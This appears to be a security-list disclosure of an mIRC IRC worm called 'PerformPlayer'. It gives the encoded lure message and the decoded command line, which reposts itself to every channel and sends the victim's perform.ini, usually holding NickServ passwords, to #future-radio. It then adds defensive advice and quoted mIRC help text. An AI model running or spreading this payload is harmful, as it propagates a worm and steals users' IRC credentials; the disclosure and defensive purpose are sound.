信息来源:securityfocus
i call it PerformPlayer
irc worm:
<nickname> ROFL! //echo -a $($decode(JGZ-...-uaSk=,m),2),0)
So what happens when decoded:
$findfile(.,*,1,scid -at1 .amsg ROFL! $!cb(1) | .play #future-radio perform.ini)
the file it finds gets echoed to active window, and two commands get executed
1) send to all connected networks, to all channels, the malicious code ( still on clipboard ) as funny message
2) play to #future-radio your perform.ini (possibly with nick/channel) paswords
Perform.ini:
this file contains the commands that are automatically executed at startup of mirc, typically your identification passwords
for example
[perform]
n0=Other Networks,/msg nickserv identify mynick mypassword
Advice;
Forbid #future-radio, and ban spammers with // $decode() links
remark:
this worm leaves no traces, only spreads once, so no on join events or stuff get written to a textfile.
it cannot be stopped by turning of mirc remote.
this worm can only be detected by monitoring the clipboard
( which should be done for every // $decode() )
//extracted from mirc help:
$findfile(dir,wildcard,N,depth,@window | command)
Searches the specified directory and its subdirectories for the Nth filename matching the wildcard file specification and returns the full path and filename if it is found.
Properties: shortfn
$findfile(c:\mirc,*.exe,1) returns c:\mirc\mirc.exe
If you specify a custom @window name (with a listbox) instead of the N parameter, mIRC will fill the custom @window listbox with the results.
If you specify a command, the command is performed on every filename that is found. You can use $1- to refer to the filename, eg.
//echo 1 $findfile($mircdir,*.*,0,echo $1-)
If you specify a depth, mIRC will only search N directories deep for matching filenames.
Note: Both the depth and @window/command parameters are optional.
Scripts can be made to perform commands on specific server connections by using /scid and /scon.
*******
/scid <-rsatM | N> [command]
Changes the active connection for a script to connection id N, where N is a $cid value.
All commands after the /scid command will be performed on the new connection id.
The -r switch resets the connection id to the original id for that script.
If you specify the command parameter, the connection id is set only for that command.
The /scon command works in exactly the same way, except that N represents the Nth connection, not a connection id value.
The -a and -tM switches can only be used if you specify a command.
The -a switch performs the command on all connection ids.
The -tM switch limits the command to being performed only on servers with a certain connection status, where M is an or'd value of 1 = server connected, 2 = not connected, 4 = connecting, 8 = not connecting.The command is only performed if M matches the connect status of the connection id.
The -s makes any called commands or identifiers show their results.
Note: If you use a command that contains $identifiers, and you want the identifiers to be evaluated in the target connection, you must pass them as $!identifier to prevent them from being evaluated first in the current connection.
*******
$cb(1) returns line 1 from the clipboard
*******
